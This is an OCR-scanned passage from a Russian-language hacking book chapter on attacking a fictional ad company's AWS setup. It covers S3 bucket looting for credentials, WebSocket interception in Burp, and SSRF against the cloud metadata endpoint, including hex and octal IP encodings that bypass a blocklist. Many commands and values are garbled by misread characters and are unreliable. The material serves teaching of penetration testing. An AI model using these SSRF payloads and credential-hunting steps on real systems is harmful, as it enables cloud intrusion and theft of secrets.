Сложно? Это мягко сказано. Я рекомендую вам создать собствен- 
ную учетную запись АМ и изучить тонкости бакетов 53, чтобы выра- 
ботать правильные рефлексы при распознавании и злоупотреблении 
чрезмерно разрешительными настройками 53. 


ШЗ 158 Существует также довольно иллюзорное понятие 
владения объектом, которое перевешивает все остальные настройки, 
кроме главного переключателя доступности. Мы займемся этим позже. 


Изучение бакетов 


Вернемся к нашему списку бакетов. Мы пытаемся просматривать их 
в браузере и снова получаем отказ во входе для всех, кроме тіѕс.тх- 
гад . сом, который, как ни странно, возвращает пустую страницу. От- 
сутствие ошибок, безусловно, обнадеживает. Давайте пойдем дальше, 
используя командную строку АМ. Сначала мы установим на рабочий 
компьютер интерфейс командной строки АМ (СМ): 


гоо@Ро\пЕ1:-/# зи40 арї іпѕёа11 амѕс1і 

гооЁ@Роіпё1:~/# амѕ сопҒідиге 

# Введите любой допустимый набор учетных данных, чтобы разблокировать СІІ. 
# Например, вы можете использовать свою собственную учетную запись АМ\5. 


Интерфейс командной строки АМ5 не принимает ОКІ-адреса $3, 
поэтому нам нужно выяснить настоящее имя бакета, стоящее за 
піѕс.тхгайѕ.сот. В большинстве случаев это так же просто, как про- 
верка записи СМАМЕ домена, что в данном случае дает тхгайѕ-тіѕс. 
53-мебѕіёе.еџ-меѕё-1. атагопамѕ. соп. Это говорит нам о том, что имя 
бакета – тхгайѕ-тіѕс. Если проверка СМАМЕ не работает, нам нужны 
более сложные приемы, например вставка в ОВТ-адрес специальных 
символов, таких как %С0, или добавление недопустимых параметров, 
чтобы попытаться заставить 55 отобразить страницу с ошибкой, со- 
держащей имя бакета. 

Вооружившись именем бакета, мы можем использовать всю мощь 
интерфейса командной строки А\М/5. Давайте начнем с получения 
полного списка объектов, присутствующих в бакете, и сохранения его 
в текстовый файл: 


гоої@Роіпё1:~/# аиз $3Зар\ 115 -објесёѕ-у2 --БисКее пхгад$-пА$с > 15% оБдесе$. хе 
гоої@Роіпё1:~/# һеай 115% _оБјесіѕ.Ёхі 
{ "Сопёеп5": [{ 

"Кеу": "Агсһіме/", 

"БаѕЕМодіҒіеа": "2015-04-08722:01:48.0007", 

"12е": 0, 


"Кеу": "Агсһіме/ о1а", 
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"БаѕЕМодіҒіеа": "2015-04-08722:01:48.0007", 
"12е": 2969, 


"Кеу": "іпаех.ҺЕт1", 
"раѕЕМодіҒіеа": "2015-04-08722:01:49.0007", 
"12е": 0, 

}, 


--5пір- - 


Мы получаем много объектов – слишком много, чтобы проверять 
их вручную. Чтобы узнать, сколько именно, мы отфильтровываем па- 
раметры Кеу: 


гоо@Роіпі1:~/# дгер '"Кеу"' 115% објесіѕ.іхі |мс -1 
425927 


Бинго! У нас есть более 400 000 файлов, хранящихся в этом одном 
бакете. Если мы сможем до них добраться, это будет хороший улов. 
В списке объектов обратите внимание на пустой 1пдех.Н+т. в кор- 
не бакета 53; этот бакет может быть настроен для работы в качестве 
веб-сайта, на котором размещаются статические файлы, такие как 
код Јауа$сгірі, изображения и НТМИ, и этот файл 1пдех. Вт. отвеча- 
ет за пустую страницу, которую мы получили ранее при обращении 
к бакету через ОВГ-адрес. 


ФАЙЛОВАЯ СИСТЕМА $3 


Обратите внимание, что во внутренней системе каталогов 53 от- 
сутствует какой-либо иерархический порядок. Распространен- 
ным заблуждением является представление о 53 как о файловой 
системе. Это не так. Здесь нет ни папок, ни даже файлов - по 
крайней мере, в их общепринятых современных определениях. 
55 — это система хранения ключей и значений. Веб-консоль А\МУ/$ 
создает иллюзию организации файлов внутри папок, но это все- 
го лишь шаманство с графическим интерфейсом. Папка в 53 – это 
просто ключ, указывающий на нулевое значение. Файл, который, 
как вам кажется, размещен внутри папки, представляет собой не 
что иное, как блок памяти, на который ссылается ключ с именем 
типа /Ро19ег/Р Це. Другими словами, используя интерфейс ко- 
мандной строки АМ, мы можем удалить папку, не удаляя файлы 
этой папки, потому что они абсолютно не связаны. 


Пришло время покопаться в данных какого-нибудь бедняги. Да- 
вайте используем шаблоны регулярных выражений для поиска сце- 
нариев 501, файлов Баз, архивов резервных копий, файлов ]ауа- 
5$сирь файлов конфигурации, снимков Ушиа[Вох - всего, что может 
дать нам ценные учетные данные: 
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# Извлекаем имена файлов в параметрах Кеу: 
гоо@Роіпё1:~/# дгер ‘”Кеу”’ 115 _оБјесѕ | ѕей ‘$/[“,]//9’ > 14 $Е_Кеу$. Ех 


гоо@Роіпё1:~/# раёегпѕ=°\. 5$ |\. $915 |\.аг\.92$\ .ргорег+іеѕ$ |\.сопҒід5|\.+9525' 


гооЁ@Роіпё1:~/# едгер $раёёегпѕ 115 _Кеуѕ.Ехё 
Кеу: деБид/360-105-ѕаҒагі /дер1оу.5һ 
Кеу: деБид /іаѕ -ураіајѕ-1оѕ /іер1оу.$һ 
Кеу: деби /ураій-айтеёгісѕ /їер1оу. ѕһ 
Кеу: Лаёат/ето/5іетргеМијег /пБрго/ргімаёе/ргімаїе.ргорегёіеѕ 
Кеу: Лаёат/ето/51етргеМијег /пБрго/ргојесі.ргорегїіеѕ 
Кеу: ето /іпаеѕідп-іттегѕіоп/дер1оу-сіп. $В 
Кеу: дето /іпеѕідп-іттегѕіоп/ер1оу.ѕһ 
Кеу: ето /іпаеѕідп-тоБіЛе-360/іер1оу.ѕһ 
- - сокращено- - 


Теперь у нас есть список файлов, которые могут нам пригодиться. 
Скачаем этих кандидатов с помощью амѕ 53Зарі де{-оБ]ес{ и возьмем- 
ся методично просматривать каждый файл, надеясь найти действи- 
тельные учетные данные в какой-либо форме. Следует иметь в виду 
интересный факт: АМ!$ по умолчанию не регистрирует операции 
с объектами 53, такие как деї -објесї и ри -ођБјесі, поэтому мы можем 
загружать файлы сколько душе угодно, зная, что никто не отслежива- 
ет наши перемещения. К сожалению, этого нельзя сказать об осталь- 
ных АРІ АМ. 

Ну вот, прошло несколько часов, а у нас до сих пор ничего нет. По- 
хоже, что большинство скриптов представляют собой старые трех- 
строчные программы, используемые для загрузки общедоступных 
документов, извлечения других скриптов, автоматизации рутинных 
команд или создания фиктивных таблиц 801. 

Нужно попробовать что-то еще. Возможно, есть файлы с конфи- 
денциальными данными, которые ускользнули от нашего предыду- 
щего фильтра шаблонов. Возможно, в общей куче прячутся файлы 
с необычными расширениями. Чтобы найти эти файлы, мы запуска- 
ем агрессивный инвертированный поиск, который отсеивает обще- 
известные и бесполезные файлы, такие как изображения, каскадные 
таблицы стилей (С$5) и шрифты, чтобы остались только редкие скры- 
тые жемчужины: 


гооє@Роіп1:~/# едгер -\\ 
«\.)р9|\.рп9|\.3$| \ .моҒҒ | /\»,$|[\.сѕ5|\.9іҒ|\.ѕуо|\.ЕЕҒ|\.еоё» 115+ Кеуѕ.хұ 


Кеу: ето/ҒогБеѕ/105/7817 /1пдех. Вет 
Кеу: ето/ҒогБеѕ /10$/7817 /\пдех_1. НЕ 
Кеу: ето/ҒогБеѕ /10$/7817 /\пдех_10. Вт 
Кеу: ето /ФогЬе$ /10$/7817 /\пдех_11. НЕ 
Кеу: ето/ҒогБеѕ /10$/7817 /\пдех_12. НЕ 
Кеу: ето /ФогЬе$ /10$/7817 /\пдех_13. Вт 
- - сокращено- - 


86 глава 5 


гооє@Роіп1:~/# амѕ 53арі деЁ-оБјесі --БисКеЕ тхгайѕ-тіѕс \ 
--Кеу йето/ҒогБеѕ/105/7817 /1піех.ҺЕті ҒогБеѕ_іпех.һт1. 


Файлы НТМЕ - это не совсем те специальные файлы, которые мы 
имели в виду, но, поскольку они представляют более 75 % файлов 
в этом бакете, нам лучше взглянуть на них. Открыв их, мы видим, что 
они выглядят как сохраненные страницы с новостных сайтов по все- 
му миру. Где-то в глубинах запутанной инфраструктуры СР какое-то 
приложение извлекает веб-страницы и сохраняет их в этом бакете. 
Хотелось бы понять, зачем. 

Помните, во введении я говорил об особом хакерском чутье? Оно 
сработало. Это та находка, которая должна вызвать у хакера чувство 
покалывания вдоль позвоночника! 


Поиск веб-приложения 


Где прячется это проклятое приложение? Чтобы отыскать его, мы 
вернемся к нашим результатам разведки Ю№ на рис. 5.1, и, конечно 
же, идеальный подозреваемый сразу мелькнет в толпе: іето.тхгайѕ. 
сом. Мы видели такое же ключевое слово ето в ключах 53 с файлами 
НТМЕГ. Нам даже не пришлось запускать команду дгер. 

Если мы введем в браузере адрес йето.тхгайѕ.соп, то увидим, что 
изображение и заголовок, похоже, описывают поведение, которое мы 
ожидали (рис. 5.3). 


| МХВ Ааѕ Рето 


79 Уочг аа еуеумћһегє 
| бав 


Рис. 5.3. Домашняя страница йето.тхгад.сот 


Чтобы поближе рассмотреть эту страницу, мы запустим Вигр Ѕ$џіїе – 
локальный веб-прокси, который удобно перехватывает и ретрансли- 
рует каждый НТТР-запрос, поступающий от нашего браузера (поклон- 
ники ОМАЅР могут использовать ХАР, 7е4 Аїѓаск Ргоху). Перезагрузим 
страницу ето .тхгайѕ.сот с запущенным Вигр и видим, как запросы, 
сделанные сайтом, передаются в режиме реального времени, как по- 
казано на рис. 5.4. 
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НТТР Велогу. | ууессоскеіз һвіогу | Орбопз 


Р\ег. помпа а! йетз 


# т Ноѕі | Метод | 18 | Рагатѕ | Ебйед | Зам 
ТЗ Ћр=270епто ТИХГа05. СОЙ СЕТ `1аетойлетезл2Раделюлопкойз/7с33. 200 
12 һірз://бето.тхгабѕ.сот СЕТ /детоћћетеѕ/ВігРасеЛіо/апітаќѓе/апі... 200 
11 һірзѕ://бето.тхгабѕ.сот СЕТ Ідетоћћетеѕ/ВігРадеЛо/опі-амеѕот... 200 
10 һрз://бето.тхгабѕ.сот СЕТ Юетойпетез/8=РаделЮ/оос!згар/сз. 200 

9 пірз://їопіѕ.доосіеаріз.сот СЕТ {сзз?\атйу=О реп+5апз:300,3001,400, У 200 

8 ћіїрз://дето.тхгабѕ.сот СЕТ 1сзз?їатћу=Ореп+5апз:300,3001,400,... У 200 

7 һірз://бето.тхгадѕ.сот СЕТ 1 200 


Рис. 5.4. Анализ демонстрационной страницы МХК А05 при помощи Вигр 


В качестве дополнительного уровня анонимности 
мы можем указать Вигр или ГАР направлять свой трафик через прок- 
си-сервер 5ОСК$, расположенный на атакующем сервере, чтобы все па- 
кеты исходили с этого удаленного хоста. Найдите прокси-сервер 5ОСК$ 
в разделе ОрНоп$ (Параметры) в Вигр. 


Это отличная поверхность атаки. Используя Вигр, мы можем пере- 
хватывать эти НТТР(5)-запросы, изменять их на лету, повторять их 
по желанию и даже настраивать правила регулярных выражений для 
автоматического сопоставления и замены заголовков. Если вы ког- 
да-либо проводили веб-пентест или СТЕ-тест, вы, должно быть, ис- 
пользовали похожий инструмент. Но пока отложим его и продолжим 
наше расследование. 

Возвращаемся к осмотру сайта йепо.тхгайѕ.сот. Как и следовало 
ожидать от такой компании, как МХВ Ад$, этот веб-сайт предлагает 
демонстрировать объявления в нескольких браузерах и устройствах, 
а также на некоторых популярных веб-сайтах, таких как пуйтез.сот 
и Шегез$ег.сот (рис. 5.5). Команды отдела продаж по всему миру, 
вероятно, используют эти функции, чтобы убедить медиапартнеров 
в том, что их технология легко интегрируется с любой веб-платфор- 
мой. Довольно умно. 


| МХР Ааѕ Рето 
Ріск а рибііѕћег 


ВЕ © 


Мем/ Үогк Иез Тһе Ведіѕїег 


Се Хеш ок тез 
Рис. 5.5. Демонстрация размещения рекламы на различных популярных сайтах 
Давайте-ка протестируем страницу, попробовав эту функцию. 
Я решил отобразить рекламу на веб-сайте Мемг ҮогКк Тітеѕ, и всплыло 


новое окно с красивой рекламой случайного парфюмерного бренда, 
размещенной на странице сегодняшнего выпуска Мем Үогк Тітеѕ. 
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Эта демонстрационная страница выглядит вполне безобидной: 
мы указываем на веб-сайт, а приложение извлекает его фактический 
контент и добавляет видеоплеер со случайной рекламой, чтобы пока- 
зать потенциальным клиентам, на что способна реклама МХК. Какие 
уязвимости она может внести? Очень многие... 

Прежде чем мы рассмотрим, как использовать это приложение, да- 
вайте сначала оценим, что происходиту него за кулисами, с помощью 
Вигр Ргоху. Что происходит, когда мы нажимаем кнопку МУТ для тес- 
тового показа рекламы? Мы видим результаты на рис. 5.6. 


Іпіегсері | НІЛР:һіѕіогум ММер5оскеіѕ һіѕїогу | Оріїопѕ 
Рег. Ніаіпо С$$, ітаде апа депега! біпагу сопќепїі 
# 1 Ноѕї |Мећода ОВ | Рагат 
1  ћір://аето.тхга@ѕ.сот СЕТ П 
ПИР 
Везропзе 
Вам | неааегѕ | нех | 


НТТР/1.1 101 Ѕуйсһіпа Ргоќосоіѕ 

Џрагаде: мерѕоскеї 

Соппесіоп: Црдгаде 

Ѕес-МерЅоскеі-Ассері: 1№]510хеіІРККкухУ8о2ҒХОМіссс= 


Рис. 5.6. Вкладка НТТР Ніѕёогу (История НТТР) после выбора опции МУТ на сайте 
аето.тхгайѕ.сот 


У нас не так много НТТР-трафика, это уж точно. После загрузки 
веб-страницы сервер отвечает сообщением «НТТР/1.1 101 Ѕуіісһіпе 
Рго{осо]5», после чего на вкладке НТТР Н15огу больше ничего не 
отображается. Нам нужно переключиться на вкладку М/ерЅосКкеѓѕ Ніѕ- 
тогу (История веб-сокетов), чтобы следить за остальной частью обмена. 


Перехват с помощью ИерЅоскеї 


Ү/еБЅосКеѓ – это еще один протокол связи наряду с НТТР, но, в отличие 
от НТТР, он полнодуплексный. В обычном протоколе НТТР каждый 
ответ сервера соответствует запросу клиента. Сервер не поддержи- 
вает состояние между двумя запросами. Состояние сеанса связи хра- 
нится в файлах сооКіе и заголовках, которые помогают внутреннему 
приложению помнить, кто и к какому ресурсу обращается. Веб-соке- 
ты работают по-другому: клиент и сервер устанавливают полнодуп- 
лексный туннель, где каждый из них может инициировать связь по 
своему желанию. Нередко на одно исходящее сообщение приходится 
несколько входящих сообщений, или наоборот. (Чтобы узнать боль- 
ше о М/ебЅосКеѓѕ, посетите сайт ћі1рѕ;//1од.іеатігееһоиѕе.сот/ап-іпіго- 
аисїіоп-іо-иеђѕоскеїѕ/.) Прелесть МерЅосКеѓѕ в том, что они не требуют 
файлов сооКіе и, следовательно, не заботятся об их поддержке. Это 
те же файлы сооКіе, которые поддерживают сеанс аутентификации 
пользователя! Поэтому всякий раз, когда происходит переключение 
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с НТТР на МеђрЅосКкеї в аутентифицированных сеансах, есть возмож- 
ность обойти контроль доступа, напрямую извлекая конфиденциаль- 
ные ресурсы с помощью МерЅосКеї вместо НТТР, но это иной класс 
уязвимости, о котором мы поговорим в другой раз. На рис. 5.7 пока- 
зана наша вкладка М'еђЅосКеїѕ Ніѕїогу. 


У | Онесвоп |Еайеа  |1епой | Сотт 
|6 ћір://дето тхгайѕ сот/ѕсгееп < То сііепі 1000223 
|5 (ћір://дето.тхгадѕ.сот/ѕсгееп _ _] Э То ѕегуег 114 
4 ћір://дето.тхгадѕ.сот/ѕсгееп Э То ѕегуег 97 
| К) ћіїр://аето.тхгадѕ.сот/ѕсгееп > То ѕегег 97 
2 ћір://дето. тхгайѕ.сот/ѕсгееп Э То ѕегуег 97 


мша 
[Вам не | 


ћірѕ:/^умм.пуітеѕ.сот/:!Мог:ііа/5.0 (Муіпаомѕ МТ 10.0; Міп64; х64; гу:69.0) беско/20100101 Еігеѓох/69.0:!951:1437 


Рис. 5.7. Вкладка МебЅоскеїѕ Ніѕїогу для дето.тхгаа5.сот 


Связь через М/ербоскеї выглядит довольно просто: каждое сооб- 
щение на сервер состоит из ОВІ-адреса (например, пуЁімеѕ. соп), за 
которым следуют показатели, относящиеся к браузеру пользовате- 
ля (Мо2111а/5.0...), а также идентификатор отображаемой рекламы 
(437). Вигр не может воспроизвести (повторить в терминологии Вигр) 
прошлые сообщения МеђЅосКеї, поэтому, чтобы подделать сообще- 
ние У/ерЅосКеї, нам нужно вручную запустить его с демонстрацион- 
ного веб-сайта. 

Мы включаем режим перехвата (іпіегсерї тоде) в настройках Вигр, 
что позволит нам перехватывать следующее сообщение обмена и об- 
новлять его на лету (рис. 5.8). Например, давайте посмотрим, сможем 
ли мы заставить сайт МЕХ А4$ получать домашнюю страницу того 
контейнера М№еіпх, который мы настроили в главе 3. 


_ДаеанттР мы [мвобоскив ие [оршопз | 
\М/ебЗоске{5 теѕѕаде {о һйр://дето.тхгайѕ.сот/ 
| Рома || Оюр | | Іліегсерііѕоп Асіоп 


Һірѕ:/№мумм.агсһімеѕ-јеѕѕіе-раскадеѕ.огд/!Могі!а/5.0 (М/іпаомѕ МТ 10.0; Міп64; х64; гу:69.0) беско/20100101 Риге 


Рис. 5.8. Перехват веб-страницы в Вигр 


Мы пересылаем измененный запрос и направляемся в наш кон- 
тейнер РосКкег для изучения журналов. Мы получаем идентифика- 
тор контейнера с помощью команды роскег рѕ, а затем передаем его 
в журналы Боскег 1095: 


гоо{@№9\пх:-/# роскег рѕ 
СОМТАТМЕВ ТО ТМАСЕ СОММАМО 
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5923186 9а5 зрагс1ом/па\... "/Біп/Баѕһ /ѕс..." 


гоо{@№9\пх:-/# роскег 1095 5923186Е49а5 
54.221.12.35 - - [26/0с/2020:13:44:08 +0000] "СЕТ / НТТР/1.1"... 


Приложение МХК Ад действительно извлекает ОВТ-адреса в режи- 
ме реального времени! Почему это так здорово, спросите вы? Видите 
ли, не все домены и ІР-адреса одинаковы. Некоторые ІР-адреса име- 
ют вполне конкретное назначение. Прекрасным примером является 
блок 127.0.0.0/8, который относится к петлевому адресу (самому хос- 
ту), или 192.168.0.0/16, который зарезервирован для частных сетей. 
Один из менее известных диапазонов ІР-адресов - 169.254.0.0/16, 
который зарезервирован Инженерной группой интернета (ІЕТЕ) для 
локальной адресации, что означает, что этот диапазон действителен 
только для связи внутри локальной сети. Например, всякий раз, когда 
компьютеру не удается получить [Р-адрес через ОНСР, он назначает 
себе ІР-адрес в этом диапазоне. Что еще более важно, этот диапазон 
также используется многими поставщиками облачных услуг для пре- 
доставления частных АРІ-интерфейсов своим виртуальным маши- 
нам, чтобы они знали о своей собственной среде. 

Почти у всех облачных провайдеров вызов на ІР-адрес 
169.254.169.254 направляется на гипервизор и позволяет извлечь ин- 
формацию о внутренних параметрах, таких как имя хоста, внутрен- 
ний [Р-адрес, правила брандмауэра и т. д. Это кладезь метаданных, 
которые могут дать нам представление о внутренней архитектуре 
компании. 

Давайте попробуем? Когда режим перехвата Вигр все еще вклю- 
чен, мы инициируем другое сообщение \МерЅосКеї для демонстрации 
рекламы в Мем УогК Тітеѕ, но на этот раз мы заменяем ОКІ-адрес 
в теле сообщения ОВГ-адресом метаданных А\М5 по умолчанию, 
Вер: //169.254.169.254/1аїеѕі, как показано далее: 


# Измененное сообщение МеБбосКе*: 
Вр: //169.254.169.254:! Мо2111а/5.0 (\Апдом$ МТ 9.0; № п64; хб4... 


Мы ждем ответа от сервера, – помните, что он асинхронный, - но 
ничего не возвращается. 

В компании МХК Аа не хотят облегчить нам жизнь. Разумно пред- 
положить, что ОВГ явно запрещен в приложении именно по этой при- 
чине. Или, может быть, приложение просто ожидает действительный 
домен? Давайте заменим ІР-адрес метаданных на более безобидный 
ЇР-адрес (например, ІР-адрес нашего контейнера Мех): 


# Измененное сообщение МеБбосКе*: 
Һер: //54.14.153.41/:! Мо7111а/5.0 (Иіпӣонѕ МТ 9.0; Міпб4; х64... 


Мы проверяем журналы и, конечно же, видим, что запрос от при- 
ложения проходит: 
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гоо@Ро\п{1:-/# роскег 1095 5923186ЕЕ4а5 
54.221.12.35 - - [26/0с/2020:13:53:12 +0000] "СЕТ / НТТР/1.1"... 


Итак, некоторые ІР-адреса разрешены, но 169.254.169.254, судя по 
всему, явно запрещен приложением. Пришло время вытащить из- 
под стола наш мешок грязных трюков с разбором адресных строк 
браузера. Хотя [Р-адреса обычно выражаются в десятичном формате, 
браузеры и веб-клиенты на самом деле довольствуются более эзоте- 
рическими представлениями, такими как шестнадцатеричное или 
восьмеричное. Например, все следующие ГР-адреса эквивалентны: 


Һер: //169.254.169.254 

Вбр: //дха9Ғеа9Ғе # Шестнадцатеричное представление 
Бер: //0хА9.0хЕЕ.0хАЭ. ОхЕЕ # Шестнадцатеричное с точками 
һер: //025177524776 # Восьмеричное представление 


Һер: //(0)(6)09).(2)(5) 0). (@)(6)09).(2)(5)(2) # Представление в Џпісойе 


Мы можем попытаться обойти блокировку ІР-адресов, попробовав 
представить адрес в шестнадцатеричном, шестнадцатеричном с точ- 
ками и восьмеричном виде. 


НАЗНАЧЕНИЕ ЧАСТНЫХ ІР-АДРЕСОВ 
ОБЩЕДОСТУПНЫМ ДОМЕНАМ 


Один из альтернативных способов – зарегистрировать собствен- 
ное доменное имя, которое разрешается в 169.254.169.254, а за- 
тем использовать это доменное имя, чтобы попытаться обойти 
зашитую в код блокировку. Ведь ничто не запрещает нам присво- 
ить частный ІР-адрес публичному домену. ІР-адрес будет сбро- 
шен первым общедоступным маршрутизатором, но поскольку 
запрос не покидает физическую сетевую карту, трюк работает, 
как задумано. 


В нашем случае сработало простое шестнадцатеричное формати- 
рование, и мы получаем знаменитый вывод АРІ метаданных АМҮ, как 
показано на рис. 5.9. 

В разделе Вам (Сырые данные) в нижней части рис. 5.9 строки 1.0, 
2007-01-19, 2007-03-01 и т. д. представляют собой разные версии ко- 
нечной точки метаданных. Вместо того чтобы указывать конкретную 
дату, мы можем использовать ключевое слово /1аїеѕі в пути, чтобы 
получить как можно больше данных, как мы увидим в следующем 
разделе. 

Полученные данные говорят о том, что у нас сработала подделка 
запроса на стороне сервера. Теперь мы потенциально способны при- 
чинить какой-нибудь ущерб! 
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а) ові  Оігесїоп |Еаќеа |1епо 


112 пёр://ето.тхгадѕ.сот/ | = То сїепі 230 
11 ћёр://аето.тхгайѕ.сот/ э То зегмег 107 
10 В р-/ето.тпхга4$.согп/ Э То ѕегуег 111 


Рис. 5.9. Вывод метаданных АИ/5 


Подделка запроса на стороне сервера 


Атака с подделкой запросов на стороне сервера (ѕегует-ѕійе тедиеѕї 
Югеегу, 55КЕ) заключается в том, что мы заставляем какое-либо при- 
ложение на стороне сервера выполнять НТТР-запросы к домену по 
нашему выбору. Иногда таким способом удается получить доступ 
к внутренним ресурсам или незащищенным панелям администриро- 
вания. 


Изучение метаданных 


Мы приступаем к сбору базовой информации о машине, на которой 
запущено это приложение для загрузки веб-страниц, снова используя 
режим перехвата Вигр. После перехвата нашего запроса мы заменя- 
ем ІР-адрес метаданных в шестнадцатеричном формате на первона- 
чально запрошенный ОВГ-адрес, а затем добавляем в конец имя АРІ 
метаданных А\М5, как показано в листинге 5.1. 


ПВ Запустите обычную машину на АИ и изучите АРІ 
метаданных, чтобы лучше понять доступную информацию. Вы можете 
найти список всех доступных полей на странице ћії1рѕ://атгп.іо/2ЕЕууРп. 


Листинг 5.1. Основная информация о веб-приложении, полученная из АР! 
метаданных 


# Регион АМ$ 
Вбр: //дха9Ғеа9ғҒе /Лаёеѕё/теа-даёа/р1асетепі/ауаі1аБіліёу -гопе 
еџ-меѕї-1а 


# Идентификатор экземпляра 
Вбр: //Оха9Ғеа9ғҒе/Лаёеѕё/теа-даёа/іпѕёапсе-ій 
© 1-088с8е93945703ссс 


# Идентификатор образа АМТ 


Вбр: //дха9Ғеа9ғҒе /Лакез+ /мефа-Фафа/ат\-19 
Ө ат -02919еа15с1778с9с 
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# Общедоступное имя хоста 
һер: / /Оха9Реа9 Те /Ла{ез* /мефа-Фафа/риБ1с-Но$Епаме 
© ес2-3-248-221-147.еи-ме${-1.сомрифе .ататопам$ . сот 


Здесь мы видим, что демонстрационное приложение работает 
в регионе еџ-меѕі-1, что указывает на один из центров обработки 
данных Ата7оп в Ирландии. В АМ5$ доступны десятки регионов. В то 
время как компании стремятся распределить свои наиболее важные 
приложения по многим регионам, вспомогательные службы, а иногда 
и серверные части, как правило, концентрируются в лишь в отдель- 
ных регионах. Идентификатор экземпляра - это уникальный иден- 
тификатор, назначаемый каждой виртуальной машине, созданной 
в сервисе ЕС2. В нашем случае это і-088с8е9305703ссс Ө. Эта инфор- 
мация может пригодиться при выполнении вызовов АМ/$ АРТ, наце- 
ленных на машину, на которой запущено рекламное приложение. 

Идентификатор образа аті -020#9еа15с1778с9с Ө указывает на мо- 
ментальный снимок, используемый для быстрого запуска машины, 
например образа ОЪипти или СогеО5. Образы машин могут быть об- 
щедоступными (доступными для всех клиентов АМ) или частными 
(доступными только для конкретной учетной записи). Этот конкрет- 
ный идентификатор АМГ является частным, поскольку его нельзя 
найти в консоли АҮ ЕС2. Если бы идентификатор АМІ не был част- 
ным, мы могли бы создать аналогичный экземпляр моментального 
снимка для тестирования будущих полезных нагрузок или сценариев. 

Наконец, общедоступное имя хоста дает нам прямой путь к ма- 
шине, на которой запущено демонстрационное приложение (или эк- 
земпляр ЕС2 на жаргоне АМ5), при условии что правила локального 
брандмауэра позволяют нам получить к нему доступ. Общедоступ- 
ный ІР-адрес этой машины можно вывести из ее канонического име- 
ни хоста: 3.248.221.147 Ө. 

Что касается конфигурации сети, давайте позаимствуем конфигу- 
рацию брандмауэра из АРІ метаданных, как показано в листинге 5.2. 
Знание правил брандмауэра может дать вам подсказки о других хос- 
тах, которые взаимодействуют с этой системой, и отом, какие службы 
могут работать на ней, даже если они не являются общедоступными. 
Правила брандмауэра определяются в объектах, называемых группа- 
ми безопасности. 


Листинг 5.2. Конфигурация брандмауэра веб-приложения 


# МАС-адрес сетевого интерфейса 
һер: //дха9Ғеа9ғҒе/Лаёеѕі/теа-йаёа/пеёногк/іпёегҒасеѕ /тас$ / 
06:а0:8#:84:1с:2а 


# Идентификатор владельца АМ5 
һер: //дха9Ғеа9ғе/.. . /тасѕ/06:а0:8#:84:1с:2а/омпег-14 
886371554408 


# Группы безопасности 
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Вбр: //дха9Ғеа9ғе/.. . /тасѕ/06:а0:8#:84:1с:2а/ѕесигіёу-дгоирѕ 
е1ь Һёёр ргой еџ-меѕЁ-1 

е1ь Һёёрѕ ргой еџ-меѕЁ-1 

соттоп _55ћ ргімаёе еџ-меѕё-1 

едгеѕѕ іпёегпеЁ_ һіЁр_ апу 


# Идентификатор подсети, в которой находится экземпляр 
һер: //дха9Ғеа9ғе/... /тасѕ/06:а0:8#:84:1с:2а/ѕиБпеї-414 
ѕирпеё-00580е48 


# Диапазон ІР-адресов подсети 
һер: //дха9Ғеа9ғе/.. . /тасѕ/06:а0:8#:84: 1с: 2а/ѕирпе-іру4-сіаг-Б1оск 
172.31.16.0/20 


Нам нужен МАС-адрес сети для получения информации о сети из 
АРІ метаданных. Владелец учетной записи АМҮ используется для соз- 
дания имен ресурсов Атагоп (Ататоп тезоигсе патеѕ, АКМ), которые 
являются уникальными идентификаторами для пользователей, поли- 
тик и почти каждого ресурса в АМ; это важная информация, которая 
окажется полезной в будущих вызовах АРІ. Значение АКМ уникально 
для каждой учетной записи, поэтому идентификатор учетной записи 
компании МХК АЯ всегда будет равен 886371554408, даже если ком- 
пания может (и часто будет) иметь несколько аккаунтов АМ, как мы 
увидим позже. 

Мы можем получить список имен групп безопасности, а не фак- 
тические правила брандмауэра, но даже он содержит достаточно ин- 
формации, чтобы угадать фактические правила брандмауэра. Раздел 
е1Ь в наборе е1ь ћёёр ргоа еџ-меѕї-1, например, указывает, что этот 
набор, скорее всего, предоставляет балансировщику нагрузки доступ 
к серверу. Интересна третья группа безопасности: соттоп_55ћ_ргі - 
уаќе-еџ-меѕї-1. Основываясь на ее названии, можно с уверенностью 
предположить, что только несколько избранных машин, обычно на- 
зываемых бастионами, имеют возможность подключаться через $$5Н 
к остальной инфраструктуре. Если мы каким-то образом сможем 
добраться до одного из этих драгоценных экземпляров, это откроет 
много-много дверей! Забавно, что мы все еще возимся у дверей орга- 
низации, но уже можем понять основные идеи устройства ее инфра- 


структуры. 


Маленький грязный секрет АРІ метаданных 


Конечно, мы далеки от завершения, так что давайте перейдем на сле- 
дующую ступеньку. Как вы видели в главе 3, АМГ5 предлагает возмож- 
ность запуска сценария при первой загрузке машины. Этот скрипт 
обычно называют изег-да*а. Мы использовали его для настройки соб- 
ственной инфраструктуры и загрузки контейнеров росКег. Отличные 
новости - такой же скрипт иѕег -йаёа доступен через АРІ метаданных. 
Отправив еще один запрос через Вигр в демонстрационное приложе- 
ние МХК А45, мы можем увидеть, что сотрудники компании навер- 
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няка использовали для настройки своих машин аналогичный скрипт, 
показанный в листинге 5.5. 


Листинг 5.3. Фрагмент сценария изег-да*а, выполняемого при первой 
загрузке машины 


# Пользовательская информация 
Вбр: //дха9Ғеа9ғҒе/Лаёеѕё/иѕег-аїа/ 


# с1оиџа-сопҒід 
© согеоѕ: 
ипіЁЅ: 
- соттапӣ: ѕЁагі 
сопЁепё: | - 
[Уп] 
реѕсгірёіоп=ріѕсоуег ТРз Фог ехїегпа1 ѕегуісеѕ 
Кедиігеѕ=есг - ѕеЁир.ѕегуісе 
- - сокращено- - 


Поток секретных данных на экране наполняет наши сердца теплом. 
58КЕ во всей красе. Давайте посмотрим, что мы получили с помощью 
последней команды. 

Помимо выполнения простых сценариев командной оболочки, 
©1044-1711 поддерживает формат файла с1оий-сопЁід, который ис- 
пользует декларативный синтаксис для подготовки и планирования 
операций загрузки. Формат с1оџй-сопҒід поддерживается многими 
дистрибутивами, в том числе СогеО$, которая, по-видимому, является 
ОС, на которой работает эта машина Ө. 

Язык с1оий-сопҒід использует синтаксис УАМГ, в котором исполь- 
зуются пробелы и символы новой строки для разграничения спис- 
ков, значений и т. д. Файл с1оџа-сопҒід описывает инструкции по 
настройке служб, созданию учетных записей, выполнению команд, 
записи файлов и выполнению других задач, связанных с операциями 
загрузки. Некоторые считают, что он проще для понимания, чем гру- 
бый сценарий Баѕћ. 

Давайте разберем наиболее важные фрагменты полученного нами 
скрипта иѕег-йаїа (листинг 5.4). 


Листинг 5.4. Продолжение сценария иѕег -аёа 


- - сокращено- - 
- соммапд: ѕёагі 
сопфепе: | 
